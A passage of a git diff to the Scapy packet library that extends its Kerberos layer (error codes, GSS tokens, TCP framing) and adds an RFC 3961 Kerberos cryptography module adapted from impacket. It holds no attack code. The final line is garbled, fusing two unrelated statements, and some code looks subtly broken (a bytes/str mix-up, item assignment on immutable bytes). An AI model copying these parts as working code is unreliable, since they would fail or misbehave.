explicit_tag=0xA1), + ASN1F_PACKET("cname", None, PrincipalName, explicit_tag=0xA2), + ASN1F_optional(Checksum(explicit_tag=0x3)), + Microseconds("cusec", 0, explicit_tag=0xA4), + KerberosTime("ctime", GeneralizedTime(), explicit_tag=0xA5), ASN1F_optional( - EncryptionKey(explicit_tag=0xa6), + EncryptionKey(explicit_tag=0xA6), ), ASN1F_optional( - UInt32("seqNumber", 0, explicit_tag=0xa7), + UInt32("seqNumber", 0, explicit_tag=0xA7), ), - ASN1F_optional( - AuthorizationData("authorizationData", explicit_tag=0xa8) - ) + ASN1F_optional(AuthorizationData("authorizationData", explicit_tag=0xA8)), ), implicit_tag=2, ) @@ -401,15 +920,14 @@ class KRB_Authenticator(ASN1_Packet): # sect 5.5.2 + class KRB_AP_REP(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_KRB_APPLICATION( ASN1F_SEQUENCE( - ASN1F_INTEGER("pvno", 5, explicit_tag=0xa0), - ASN1F_enum_INTEGER("msgType", 15, KRB_MSG_TYPES, - explicit_tag=0xa1), - ASN1F_PACKET("encPart", None, EncryptedData, - explicit_tag=0xa2), + ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), + ASN1F_enum_INTEGER("msgType", 15, KRB_MSG_TYPES, explicit_tag=0xA1), + ASN1F_PACKET("encPart", None, EncryptedData, explicit_tag=0xA2), ), implicit_tag=15, ) @@ -417,79 +935,145 @@ class KRB_AP_REP(ASN1_Packet): # sect 5.9.1 + +class MethodData(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF("seq", [PADATA()], PADATA) + + +class _KRBERROR_data_Field(ASN1F_STRING): + holds_packets = 1 + + def m2i(self, pkt, s): + val = super(_KRBERROR_data_Field, self).m2i(pkt, s) + if not val[0].val: + return val + if pkt.errorCode.val == 25: # KDC_ERR_PREAUTH_REQUIRED + return MethodData(val[0].val, _underlayer=pkt), b"" + return val, b"" + + def i2m(self, pkt, val): + if isinstance(val, ASN1_Packet): + val = ASN1_STRING(bytes(val)) + return super(_KRBERROR_data_Field, self).i2m(pkt, val) + + class KRB_ERROR(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_KRB_APPLICATION( ASN1F_SEQUENCE( - ASN1F_INTEGER("pvno", 5, explicit_tag=0xa0), - ASN1F_enum_INTEGER("msgType", 30, KRB_MSG_TYPES, - explicit_tag=0xa1), + ASN1F_INTEGER("pvno", 5, explicit_tag=0xA0), + ASN1F_enum_INTEGER("msgType", 30, KRB_MSG_TYPES, explicit_tag=0xA1), ASN1F_optional( - KerberosTime("ctime", 0, explicit_tag=0xa2), + KerberosTime("ctime", GeneralizedTime(), explicit_tag=0xA2), ), ASN1F_optional( - Microseconds("cusec", 0, explicit_tag=0xa3), + Microseconds("cusec", 0, explicit_tag=0xA3), ), - KerberosTime("stime", 0, explicit_tag=0xa4), - Microseconds("susec", 0, explicit_tag=0xa5), - ASN1F_INTEGER("errorCode", 0, explicit_tag=0xa6), - ASN1F_optional( - Realm("crealm", "", explicit_tag=0xa7) + KerberosTime("stime", GeneralizedTime(), explicit_tag=0xA4), + Microseconds("susec", 0, explicit_tag=0xA5), + ASN1F_enum_INTEGER( + "errorCode", + 0, + { + # RFC4120 sect 7.5.9 + 0: "KDC_ERR_NONE", + 1: "KDC_ERR_NAME_EXP", + 2: "KDC_ERR_SERVICE_EXP", + 3: "KDC_ERR_BAD_PVNO", + 4: "KDC_ERR_C_OLD_MAST_KVNO", + 5: "KDC_ERR_S_OLD_MAST_KVNO", + 6: "KDC_ERR_C_PRINCIPAL_UNKNOWN", + 7: "KDC_ERR_S_PRINCIPAL_UNKNOWN", + 8: "KDC_ERR_PRINCIPAL_NOT_UNIQUE", + 9: "KDC_ERR_NULL_KEY", + 10: "KDC_ERR_CANNOT_POSTDATE", + 11: "KDC_ERR_NEVER_VALID", + 12: "KDC_ERR_POLICY", + 13: "KDC_ERR_BADOPTION", + 14: "KDC_ERR_ETYPE_NOSUPP", + 15: "KDC_ERR_SUMTYPE_NOSUPP", + 16: "KDC_ERR_PADATA_TYPE_NOSUPP", + 17: "KDC_ERR_TRTYPE_NOSUPP", + 18: "KDC_ERR_CLIENT_REVOKED", + 19: "KDC_ERR_SERVICE_REVOKED", + 20: "KDC_ERR_TGT_REVOKED", + 21: "KDC_ERR_CLIENT_NOTYET", + 22: "KDC_ERR_SERVICE_NOTYET", + 23: "KDC_ERR_KEY_EXPIRED", + 24: "KDC_ERR_PREAUTH_FAILED", + 25: "KDC_ERR_PREAUTH_REQUIRED", + 26: "KDC_ERR_SERVER_NOMATCH", + 27: "KDC_ERR_MUST_USE_USER2USER", + 28: "KDC_ERR_PATH_NOT_ACCEPTED", + 29: "KDC_ERR_SVC_UNAVAILABLE", + 31: "KRB_AP_ERR_BAD_INTEGRITY", + 32: "KRB_AP_ERR_TKT_EXPIRED", + 33: "KRB_AP_ERR_TKT_NYV", + 34: "KRB_AP_ERR_REPEAT", + 35: "KRB_AP_ERR_NOT_US", + 36: "KRB_AP_ERR_BADMATCH", + 37: "KRB_AP_ERR_SKEW", + 38: "KRB_AP_ERR_BADADDR", + 39: "KRB_AP_ERR_BADVERSION", + 40: "KRB_AP_ERR_MSG_TYPE", + 41: "KRB_AP_ERR_MODIFIED", + 42: "KRB_AP_ERR_BADORDER", + 44: "KRB_AP_ERR_BADKEYVER", + 45: "KRB_AP_ERR_NOKEY", + 46: "KRB_AP_ERR_MUT_FAIL", + 47: "KRB_AP_ERR_BADDIRECTION", + 48: "KRB_AP_ERR_METHOD", + 49: "KRB_AP_ERR_BADSEQ", + 50: "KRB_AP_ERR_INAPP_CKSUM", + 51: "KRB_AP_PATH_NOT_ACCEPTED", + 52: "KRB_ERR_RESPONSE_TOO_BIG", + 60: "KRB_ERR_GENERIC", + 61: "KRB_ERR_FIELD_TOOLONG", + 62: "KDC_ERROR_CLIENT_NOT_TRUSTED", + 63: "KDC_ERROR_KDC_NOT_TRUSTED", + 64: "KDC_ERROR_INVALID_SIG", + 65: "KDC_ERR_KEY_TOO_WEAK", + 66: "KDC_ERR_CERTIFICATE_MISMATCH", + 67: "KRB_AP_ERR_NO_TGT", + 68: "KDC_ERR_WRONG_REALM", + 69: "KRB_AP_ERR_USER_TO_USER_REQUIRED", + 70: "KDC_ERR_CANT_VERIFY_CERTIFICATE", + 71: "KDC_ERR_INVALID_CERTIFICATE", + 72: "KDC_ERR_REVOKED_CERTIFICATE", + 73: "KDC_ERR_REVOCATION_STATUS_UNKNOWN", + 74: "KDC_ERR_REVOCATION_STATUS_UNAVAILABLE", + 75: "KDC_ERR_CLIENT_NAME_MISMATCH", + 76: "KDC_ERR_KDC_NAME_MISMATCH", + }, + explicit_tag=0xA6, ), + ASN1F_optional(Realm("crealm", "", explicit_tag=0xA7)), ASN1F_optional( - ASN1F_PACKET("cname", None, PrincipalName, - explicit_tag=0xa8), - ), - Realm("realm", "", explicit_tag=0xa9), - ASN1F_PACKET("sname", None, PrincipalName, - explicit_tag=0xaa), - ASN1F_optional( - KerberosString("eText", "", explicit_tag=0xab) - ), - ASN1F_optional( - ASN1F_STRING("eData", "", explicit_tag=0xac) + ASN1F_PACKET("cname", None, PrincipalName, explicit_tag=0xA8), ), + Realm("realm", "", explicit_tag=0xA9), + ASN1F_PACKET("sname", None, PrincipalName, explicit_tag=0xAA), + ASN1F_optional(KerberosString("eText", "", explicit_tag=0xAB)), + ASN1F_optional(_KRBERROR_data_Field("eData", "", explicit_tag=0xAC)), ), implicit_tag=30, ) -# Entry class - -# sect 5.10 - - -class Kerberos(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_CHOICE( - "root", - None, - KRB_Ticket, # [APPLICATION 1] - KRB_Authenticator, # [APPLICATION 2] - KRB_AS_REQ, # [APPLICATION 10] - KRB_AS_REP, # [APPLICATION 11] - KRB_TGS_REQ, # [APPLICATION 12] - KRB_TGS_REP, # [APPLICATION 13] - KRB_AP_REQ, # [APPLICATION 14] - KRB_AP_REP, # [APPLICATION 15] - KRB_ERROR, # [APPLICATION 30] - ) - - -bind_bottom_up(UDP, Kerberos, sport=88) -bind_bottom_up(UDP, Kerberos, dport=88) -bind_layers(UDP, Kerberos, sport=88, dport=88) - # Kerberos V5 GSS-API - RFC1964 and RFC4121 _TOK_IDS = { # RFC 1964 + b"\x01\x00": "GSS_InitialContextToken_1964 (AP-REQ)", + b"\x02\x00": "GSS_InitialContextToken_1964 (AP-REP)", + b"\x03\x00": "GSS_InitialContextToken_1964 (ERROR)", b"\x01\x01": "GSS_GetMIC-RFC1964", b"\x02\x01": "GSS_Wrap-RFC1964", b"\x01\x02": "GSS_Delete_sec_context-RFC1964", # RFC 4121 b"\x04\x04": "GSS_GetMIC", - b"\x05\x04": "GSS_Wrap" + b"\x05\x04": "GSS_Wrap", } _SGN_ALGS = { 0: "DES MAC MD5", @@ -498,9 +1082,39 @@ class Kerberos(ASN1_Packet): } _SEAL_ALGS = { 0: "DES", - 0xffff: "none", + 0xFFFF: "none", } + +# RFC 1964 - sect 1.1 + + +class KRB5_InitialContextToken_innerContextToken(Packet): + name = "Kerberos v5 InitialContextToken innerContextToken (RFC1964)" + fields_desc = [ + StrFixedLenEnumField("TOK_ID", b"\x01\x01", _TOK_IDS, length=2), + ] + + +# RFC 1964 - sect 1.1 + + +class KRB_InitialContextToken(ASN1_Packet): + name = "Kerberos v5 InitialContextToken (RFC1964)" + # It's funny how useless this wrapping is + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + ASN1F_OID("MechType", "1.2.840.113554.1.2.2"), + ASN1F_PACKET( + "innerContextToken", + KRB5_InitialContextToken_innerContextToken(), + KRB5_InitialContextToken_innerContextToken, + implicit_tag=0x0, + ), + implicit_tag=0, + ) + + # RFC 1964 - sect 1.2.1 @@ -509,7 +1123,7 @@ class KRB5_GSS_GetMIC_RFC1964(Packet): fields_desc = [ StrFixedLenEnumField("TOK_ID", b"\x01\x01", _TOK_IDS, length=2), LEShortEnumField("SGN_ALG", 0, _SGN_ALGS), - LEIntField("reserved", 0xffffffff), + LEIntField("reserved", 0xFFFFFFFF), XStrFixedLenField("SND_SEQ", b"", length=8), PadField( # sect 1.2.2.3 XStrFixedLenField("SGN_CKSUM", b"", length=8), @@ -519,8 +1133,6 @@ class KRB5_GSS_GetMIC_RFC1964(Packet): ] -bind_layers(KRB5_GSS_GetMIC_RFC1964, Kerberos) - # RFC 1964 - sect 1.2.2 @@ -530,7 +1142,7 @@ class KRB5_GSS_Wrap_RFC1964(Packet): StrFixedLenEnumField("TOK_ID", b"\x02\x01", _TOK_IDS, length=2), LEShortEnumField("SGN_ALG", 0, _SGN_ALGS), LEShortEnumField("SEAL_ALG", 0, _SEAL_ALGS), - LEShortField("reserved", 0xffff), + LEShortField("reserved", 0xFFFF), XStrFixedLenField("SND_SEQ", b"", length=8), PadField( # sect 1.2.2.3 XStrFixedLenField("SGN_CKSUM", b"", length=8), @@ -542,8 +1154,6 @@ class KRB5_GSS_Wrap_RFC1964(Packet): ] -bind_layers(KRB5_GSS_Wrap_RFC1964, Kerberos) - # RFC 1964 - sect 1.2.2 @@ -553,11 +1163,7 @@ class KRB5_GSS_Delete_sec_context_RFC1964(Packet): fields_desc = KRB5_GSS_GetMIC_RFC1964.fields_desc -bind_layers(KRB5_GSS_Wrap_RFC1964, Kerberos) - - # RFC 4121 - sect 4.2.2 - _KRB5_GSS_Flags = [ "SentByAcceptor", "Sealed", @@ -573,7 +1179,7 @@ class KRB5_GSS_GetMIC(Packet): fields_desc = [ StrFixedLenEnumField("TOK_ID", b"\x04\x04", _TOK_IDS, length=2), FlagsField("Flags", 8, 0, _KRB5_GSS_Flags), - LEIntField("reserved", 0xffffffff), + LEIntField("reserved", 0xFFFFFFFF), XStrFixedLenField("SND_SEQ", b"", length=8), PadField( XStrFixedLenField("SGN_CKSUM", b"", length=8), @@ -582,6 +1188,7 @@ class KRB5_GSS_GetMIC(Packet): ), ] + # RFC 4121 - sect 4.2.6.2 @@ -590,7 +1197,7 @@ class KRB5_GSS_Wrap(Packet): fields_desc = [ StrFixedLenEnumField("TOK_ID", b"\x05\x04", _TOK_IDS, length=2), FlagsField("Flags", 8, 0, _KRB5_GSS_Flags), - ByteField("reserved", 0xff), + ByteField("reserved", 0xFF), ShortField("EC", 0), # Big endian ShortField("RRC", 0), # Big endian XStrFixedLenField("SND_SEQ", b"", length=8), @@ -602,7 +1209,8 @@ class KRB5_GSS_Wrap(Packet): ] -# Main class +# Main classes + class KRB5_GSS(Packet): @classmethod @@ -614,8 +1222,67 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return KRB5_GSS_Wrap_RFC1964 elif _pkt[:2] == b"\x01\x02": return KRB5_GSS_Delete_sec_context_RFC1964 + elif _pkt[:2] in [b"\x01\x00", "\x02\x00", "\x03\x00"]: + return KRB5_InitialContextToken_innerContextToken elif _pkt[:2] == b"\x04\x04": return KRB5_GSS_GetMIC elif _pkt[:2] == b"\x05\x04": return KRB5_GSS_Wrap return KRB5_GSS_Wrap + + +# Entry class + +# RFC4120 sect 5.10 + + +class Kerberos(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "root", + None, + KRB_InitialContextToken, # [APPLICATION 0] + KRB_Ticket, # [APPLICATION 1] + KRB_Authenticator, # [APPLICATION 2] + KRB_AS_REQ, # [APPLICATION 10] + KRB_AS_REP, # [APPLICATION 11] + KRB_TGS_REQ, # [APPLICATION 12] + KRB_TGS_REP, # [APPLICATION 13] + KRB_AP_REQ, # [APPLICATION 14] + KRB_AP_REP, # [APPLICATION 15] + KRB_ERROR, # [APPLICATION 30] + ) + + def mysummary(self): + return self.root.summary() + + +bind_bottom_up(UDP, Kerberos, sport=88) +bind_bottom_up(UDP, Kerberos, dport=88) +bind_layers(UDP, Kerberos, sport=88, dport=88) + +bind_layers(KRB5_InitialContextToken_innerContextToken, Kerberos) +bind_layers(KRB5_GSS_GetMIC_RFC1964, Kerberos) +bind_layers(KRB5_GSS_Wrap_RFC1964, Kerberos) +bind_layers(KRB5_GSS_Wrap_RFC1964, Kerberos) + + +# RFC4120 sect 7.2.2 + + +class KerberosTCPHeader(Packet): + fields_desc = [LenField("len", None, fmt="!I")] + + @classmethod + def tcp_reassemble(cls, data, *args, **kwargs): + if len(data) < 4: + return None + length = struct.unpack("!I", data[:4])[0] + if len(data) == length + 4: + return cls(data) + + +bind_layers(KerberosTCPHeader, Kerberos) + +bind_bottom_up(TCP, KerberosTCPHeader, sport=88) +bind_layers(TCP, KerberosTCPHeader, dport=88) diff --git a/scapy/libs/rfc3961.py b/scapy/libs/rfc3961.py new file mode 100644 index 00000000000..ef205866dad --- /dev/null +++ b/scapy/libs/rfc3961.py @@ -0,0 +1,729 @@ +# SPDX-License-Identifier: BSD-2-Clause +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (c) 2013, Marc Horowitz + +""" +Implementation of RFC 3961's cryptographic functions +""" + +# The following is a modified version of +# https://github.com/SecureAuthCorp/impacket/blob/3ec59074ec35c06bbd4312d1042f0e23f4a1b41f/impacket/krb5/crypto.py +# itself heavily inspired from +# https://github.com/mhorowitz/pykrb5/blob/master/krb5/crypto.py +# Note that the following work is based only on THIS COMMIT from impacket, +# which is therefore under mhorowitz's BSD 2-clause "simplified" license. + +import math +import os +import struct +from scapy.compat import orb, chb, int_bytes, bytes_int, plain_str + +try: + from Cryptodome.Cipher import AES, DES3, ARC4, DES + from Cryptodome.Hash import HMAC, MD4, MD5, SHA + from Cryptodome.Protocol.KDF import PBKDF2 +except ImportError: + raise ImportError( + "To use kerberos cryptography, you need to install pycryptodome.\n" + "pip install pycryptodome" + ) + +__all__ = [ + "EncryptionType", + "ChecksumType", + "Key", + "InvalidChecksum", +] + + +class EncryptionType: + DES_CRC = 1 + DES_MD4 = 2 + DES_MD5 = 3 + DES3 = 16 + AES128 = 17 + AES256 = 18 + RC4 = 23 + + +class ChecksumType: + CRC32 = 1 + MD4 = 2 + MD4_DES = 3 + MD5 = 7 + MD5_DES = 8 + SHA1 = 9 + SHA1_DES3 = 12 + SHA1_AES128 = 15 + SHA1_AES256 = 16 + HMAC_MD5 = -138 + + +class InvalidChecksum(ValueError): + pass + + +def _n_fold(s, n): + """ + https://www.gnu.org/software/shishi/ides.pdf - APPENDIX B + """ + + def rot13(x, nb): + x = bytes_int(x) + mod = (1 << (nb * 8)) - 1 + if nb == 0: + return x + elif nb == 1: + return int_bytes(((x >> 5) | (x << (nb * 8 - 5))) & mod, nb) + else: + return int_bytes(((x >> 13) | (x << (nb * 8 - 13))) & mod, nb) + + def ocadd(x, y, nb): + v = [a + b for a, b in zip(x, y)] + while any(x & ~0xFF for x in v): + v = [(v[i - nb + 1] >> 8) + (v[i] & 0xFF) for i in range(nb)] + return bytearray(x for x in v) + + m = len(s) + lcm = math.lcm(n, m) + buf = bytearray() + for _ in range(lcm // m): + buf += s + s = rot13(s, m) + out = b"\x00" * n + for i in range(0, lcm, n): + out = ocadd(out, buf[i: i + n], n) + return bytes(out) + + +def _zeropad(s, padsize): + """ + Return s padded with 0 bytes to a multiple of padsize. + """ + return s + b"\x00" * (-len(s) % padsize) + + +def _xorbytes(b1, b2): + """ + xor two strings together and return the resulting string + """ + assert len(b1) == len(b2) + return bytearray((x ^ y) for x, y in zip(b1, b2)) + + +def _mac_equal(mac1, mac2): + # Constant-time comparison function. (We can't use HMAC.verify + # since we use truncated macs.) + assert len(mac1) == len(mac2) + res = 0 + for x, y in zip(mac1, mac2): + res |= x ^ y + return res == 0 + + +WEAK_DES_KEYS = set( + [ + b"\x01" * 8, + b"\xfe" * 8, + b"\xe0" * 4 + b"\xf1" * 4, + b"\x1f" * 4 + b"\x0e" * 4, + b"\x01\x1f\x01\x1f\x01\x0e\x01\x0e", + b"\x1f\x01\x1f\x01\x0e\x01\x0e\x01", + b"\x01\xe0\x01\xe0\x01\xf1\x01\xf1", + b"\xe0\x01\xe0\x01\xf1\x01\xf1\x01", + b"\x01\xfe\x01\xfe\x01\xfe\x01\xfe", + b"\xfe\x01\xfe\x01\xfe\x01\xfe\x01", + b"\x1f\xe0\x1f\xe0\x0e\xf1\x0e\xf1", + b"\xe0\x1f\xe0\x1f\xf1\x0e\xf1\x0e", + b"\x1f\xfe\x1f\xfe\x0e\xfe\x0e\xfe", + b"\xfe\x1f\xfe\x1f\xfe\x0e\xfe\x0e", + b"\xe0\xfe\xe0\xfe\xf1\xfe\xf1\xfe", + b"\xfe\xe0\xfe\xe0\xfe\xf1\xfe\xf1", + ] +) + + +class _EncryptionAlgorithmProfile(object): + """ + Base class for etype profiles. + + Usable etype classes must define: + :attr etype: etype number + :attr keysize: protocol size of key in bytes + :attr seedsize: random_to_key input size in bytes + :attr random_to_key: (if the keyspace is not dense) + :attr string_to_key: + :attr encrypt: + :attr decrypt: + :attr prf: + """ + + @classmethod + def random_to_key(cls, seed): + if len(seed) != cls.seedsize: + raise ValueError("Wrong seed length") + return Key(cls.etype, key=seed) + + +class _SimplifiedEncryptionProfile(_EncryptionAlgorithmProfile): + """ + Base class for etypes using the RFC 3961 simplified profile. + Defines the encrypt, decrypt, and prf methods. + + Subclasses must define: + + :param blocksize: Underlying cipher block size in bytes + :param padsize: Underlying cipher padding multiple (1 or blocksize) + :param macsize: Size of integrity MAC in bytes + :param hash: underlying hash function + :param basic_encrypt, basic_decrypt: Underlying CBC/CTS cipher + """ + + @classmethod + def derive(cls, key, constant): + """ + Also known as "DK" in RFC3961. + """ + # RFC 3961 only says to n-fold the constant only if it is + # shorter than the cipher block size. But all Unix + # implementations n-fold constants if their length is larger + # than the block size as well, and n-folding when the length + # is equal to the block size is a no-op. + plaintext = _n_fold(constant, cls.blocksize) + rndseed = b"" + while len(rndseed) < cls.seedsize: + ciphertext = cls.basic_encrypt(key, plaintext) + rndseed += ciphertext + plaintext = ciphertext + # DK(Key, Constant) = random-to-key(DR(Key, Constant)) + return cls.random_to_key(rndseed[0: cls.seedsize]) + + @classmethod + def encrypt(cls, key, keyusage, plaintext, confounder): + """ + encryption function + """ + ki = cls.derive(key, struct.pack(">IB", keyusage, 0x55)) + ke = cls.derive(key, struct.pack(">IB", keyusage, 0xAA)) + if confounder is None: + confounder = os.urandom(cls.blocksize) + basic_plaintext = confounder + _zeropad(plaintext, cls.padsize) + hmac = HMAC.new(ki.key, basic_plaintext, cls.hashmod).digest() + return cls.basic_encrypt(ke, basic_plaintext) + hmac[: cls.macsize] + + @classmethod + def decrypt(cls, key, keyusage, ciphertext): + """ + decryption function + """ + ki = cls.derive(key, struct.pack(">IB", keyusage, 0x55)) + ke = cls.derive(key, struct.pack(">IB", keyusage, 0xAA)) + if len(ciphertext) < cls.blocksize + cls.macsize: + raise ValueError("Ciphertext too short") + basic_ctext, mac = bytearray(ciphertext[: -cls.macsize]), bytearray( + ciphertext[-cls.macsize:] + ) + if len(basic_ctext) % cls.padsize != 0: + raise ValueError("ciphertext does not meet padding requirement") + basic_plaintext = cls.basic_decrypt(ke, bytes(basic_ctext)) + hmac = bytearray(HMAC.new(ki.key, basic_plaintext, cls.hashmod).digest()) + expmac = hmac[: cls.macsize] + if not _mac_equal(mac, expmac): + raise ValueError("ciphertext integrity failure") + # Discard the confounder. + return bytes(basic_plaintext[cls.blocksize:]) + + @classmethod + def prf(cls, key, string): + """ + pseudo-random function + """ + # Hash the input. RFC 3961 says to truncate to the padding + # size, but implementations truncate to the block size. + hashval = cls.hashmod.new(string).digest() + if len(hashval) % cls.blocksize: + hashval = hashval[: -(len(hashval) % cls.blocksize)] + # Encrypt the hash with a derived key. + kp = cls.derive(key, b"prf") + return cls.basic_encrypt(kp, hashval) + + +class _DESCBC(_SimplifiedEncryptionProfile): + keysize = 8 + seedsize = 8 + blocksize = 8 + padsize = 8 + macsize = 16 + hashmod = MD5 + + @classmethod + def encrypt(cls, key, keyusage, plaintext, confounder): + if confounder is None: + confounder = os.urandom(cls.blocksize) + basic_plaintext = ( + confounder + b"\x00" * cls.macsize + _zeropad(plaintext, cls.padsize) + ) + checksum = cls.hashmod.new(basic_plaintext).digest() + basic_plaintext = ( + basic_plaintext[: len(confounder)] + + checksum + + basic_plaintext[len(confounder) + len(checksum):] + ) + return cls.basic_encrypt(key, basic_plaintext) + + @classmethod + def decrypt(cls, key, keyusage, ciphertext): + if len(ciphertext) < cls.blocksize + cls.macsize: + raise ValueError("ciphertext too short") + + complex_plaintext = cls.basic_decrypt(key, ciphertext) + cofounder = complex_plaintext[: cls.padsize] + mac = complex_plaintext[cls.padsize: cls.padsize + cls.macsize] + message = complex_plaintext[cls.padsize + cls.macsize:] + + expmac = bytearray( + cls.hashmod.new(cofounder + b"\x00" * cls.macsize + message).digest() + ) + if not _mac_equal(mac, expmac): + raise InvalidChecksum("ciphertext integrity failure") + return bytes(message) + + @classmethod + def mit_des_string_to_key(cls, string, salt): + def fixparity(deskey): + temp = b"" + for i in range(len(deskey)): + t = (bin(orb(deskey[i]))[2:]).rjust(8, "0") + if t[:7].count("1") % 2 == 0: + temp += chb(int(t[:7] + "1", 2)) + else: + temp += chb(int(t[:7] + "0", 2)) + return temp + + def addparity(l1): + temp = list() + for byte in l1: + if (bin(byte).count("1") % 2) == 0: + byte = (byte << 1) | 0b00000001 + else: + byte = (byte << 1) & 0b11111110 + temp.append(byte) + return temp + + def XOR(l1, l2): + temp = list() + for b1, b2 in zip(l1, l2): + temp.append((b1 ^ b2) & 0b01111111) + + return temp + + odd = True + tempstring = [0, 0, 0, 0, 0, 0, 0, 0] + s = _zeropad(string + salt, cls.padsize) + + for block in [s[i: i + 8] for i in range(0, len(s), 8)]: + temp56 = list() + # removeMSBits + for byte in block: + temp56.append(orb(byte) & 0b01111111) + + # reverse + if odd is False: + bintemp = b"" + for byte in temp56: + bintemp += bin(byte)[2:].rjust(7, "0").encode() + bintemp = bintemp[::-1] + + temp56 = list() + for bits7 in [bintemp[i: i + 7] for i in range(0, len(bintemp), 7)]: + temp56.append(int(bits7, 2)) + + odd = not odd + tempstring = XOR(tempstring, temp56) + + tempkey = bytearray(b"".join(chb(byte) for byte in addparity(tempstring))) + if bytes(tempkey) in WEAK_DES_KEYS: + tempkey[7] = tempkey[7] ^ 0xF0 + + cipher = DES.new(tempkey, DES.MODE_CBC, tempkey) + chekcsumkey = cipher.encrypt(s)[-8:] + chekcsumkey = bytearray(fixparity(chekcsumkey)) + if bytes(chekcsumkey) in WEAK_DES_KEYS: + chekcsumkey[7] = chekcsumkey[7] ^ 0xF0 + + return Key(cls.etype, key=bytes(chekcsumkey)) + + @classmethod + def basic_encrypt(cls, key, plaintext): + assert len(plaintext) % 8 == 0 + des = DES.new(key.key, DES.MODE_CBC, b"\0" * 8) + return des.encrypt(bytes(plaintext)) + + @classmethod + def basic_decrypt(cls, key, ciphertext): + assert len(ciphertext) % 8 == 0 + des = DES.new(key.key, DES.MODE_CBC, b"\0" * 8) + return des.decrypt(bytes(ciphertext)) + + @classmethod + def string_to_key(cls, string, salt, params): + if params is not None and params != b"": + raise ValueError("Invalid DES string-to-key parameters") + key = cls.mit_des_string_to_key(string, salt) + return key + + +class _DESMD5(_DESCBC): + etype = EncryptionType.DES_MD5 + hashmod = MD5 + + +class _DESMD4(_DESCBC): + etype = EncryptionType.DES_MD4 + hashmod = MD4 + + +class _DES3CBC(_SimplifiedEncryptionProfile): + etype = EncryptionType.DES3 + keysize = 24 + seedsize = 21 + blocksize = 8 + padsize = 8 + macsize = 20 + hashmod = SHA + + @classmethod + def random_to_key(cls, seed): + # XXX Maybe reframe as _DESEncryptionType.random_to_key and use that + # way from DES3 random-to-key when DES is implemented, since + # MIT does this instead of the RFC 3961 random-to-key. + def expand(seed): + def parity(b): + # Return b with the low-order bit set to yield odd parity. + b &= ~1 + return b if bin(b & ~1).count("1") % 2 else b | 1 + + assert len(seed) == 7 + firstbytes = [parity(b & ~1) for b in seed] + lastbyte = parity(sum((seed[i] & 1) << i + 1 for i in range(7))) + keybytes = bytes(bytearray(firstbytes + [lastbyte])) + if keybytes in WEAK_DES_KEYS: + keybytes[7] = keybytes[7] ^ 0xF0 + return bytes(keybytes) + + seed = bytearray(seed) + if len(seed) != 21: + raise ValueError("Wrong seed length") + k1, k2, k3 = expand(seed[:7]), expand(seed[7:14]), expand(seed[14:]) + return Key(cls.etype, key=k1 + k2 + k3) + + @classmethod + def string_to_key(cls, string, salt, params): + if params is not None and params != b"": + raise ValueError("Invalid DES3 string-to-key parameters") + k = cls.random_to_key(_n_fold(string + salt, 21)) + return cls.derive(k, b"kerberos") + + @classmethod + def basic_encrypt(cls, key, plaintext): + assert len(plaintext) % 8 == 0 + des3 = DES3.new(key.key, AES.MODE_CBC, b"\0" * 8) + return des3.encrypt(bytes(plaintext)) + + @classmethod + def basic_decrypt(cls, key, ciphertext): + assert len(ciphertext) % 8 == 0 + des3 = DES3.new(key.key, AES.MODE_CBC, b"\0" * 8) + return des3.decrypt(bytes(ciphertext)) + + +class _AESEncryptionType(_SimplifiedEncryptionProfile): + # Base class for aes128-cts and aes256-cts. + blocksize = 16 + padsize = 1 + macsize = 12 + hashmod = SHA + + @classmethod + def string_to_key(cls, string, salt, params): + iterations = struct.unpack(">L", params or b"\x00\x00\x10\x00")[0] + prf = lambda p, s: HMAC.new(p, s, SHA).digest() + seed = PBKDF2(string, salt, cls.seedsize, iterations, prf) + tkey = cls.random_to_key(seed) + return cls.derive(tkey, b"kerberos") + + @classmethod + def basic_encrypt(cls, key, plaintext): + assert len(plaintext) >= 16 + aes = AES.new(key.key, AES.MODE_CBC, b"\0" * 16) + ctext = aes.encrypt(_zeropad(bytes(plaintext), 16)) + if len(plaintext) > 16: + # Swap the last two ciphertext blocks and truncate the + # final block to match the plaintext length. + lastlen = len(plaintext) % 16 or 16 + ctext = ctext[:-32] + ctext[-16:] + ctext[-32:-16][:lastlen] + return ctext + + @classmethod + def basic_decrypt(cls, key, ciphertext): + assert len(ciphertext) >= 16 + aes = AES.new(key.key, AES.MODE_ECB) + if len(ciphertext) == 16: + return aes.decrypt(ciphertext) + # Split the ciphertext into blocks. The last block may be partial. + cblocks = [ + bytearray(ciphertext[p: p + 16]) for p in range(0, len(ciphertext), 16) + ] + lastlen = len(cblocks[-1]) + # CBC-decrypt all but the last two blocks. + prev_cblock = bytearray(16) + plaintext = b"" + for bb in cblocks[:-2]: + plaintext += _xorbytes(bytearray(aes.decrypt(bytes(bb))), prev_cblock) + prev_cblock = bb + # Decrypt the second-to-last cipher block. The left side of + # the decrypted block will be the final block of plaintext + # xor'd with the final partial cipher block; the right side + # will be the omitted bytes of ciphertext from the final + # block. + bb = bytearray(aes.decrypt(bytes(cblocks[-2]))) + lastplaintext = _xorbytes(bb[:lastlen], cblocks[-1]) + omitted = bb[lastlen:] + # Decrypt the final cipher block plus the omitted bytes to get + # the second-to-last plaintext block. + plaintext += _xorbytes( + bytearray(aes.decrypt(bytes(cblocks[-1]) + bytes(omitted))), prev_cblock + ) + return plaintext + lastplaintext + + +class _AES128CTS(_AESEncryptionType): + etype = 17 # AES128 + keysize = 16 + seedsize = 16 + + +class _AES256CTS(_AESEncryptionType): + etype = 18 # AES256 + keysize = 32 + seedsize = 32 + + +class _RC4(_EncryptionAlgorithmProfile): + etype = 23 # RC4 + keysize = 16 + seedsize = 16 + + @staticmethod + def usage_str(keyusage): + # Return a four-byte string for an RFC 3961 keyusage, using + # the RFC 4757 rules. Per the errata, do not map 9 to 8. + table = {3: 8, 23: 13} + msusage = table[keyusage] if keyusage in table else keyusage + return struct.pack("IB", keyusage, 0x99)) + 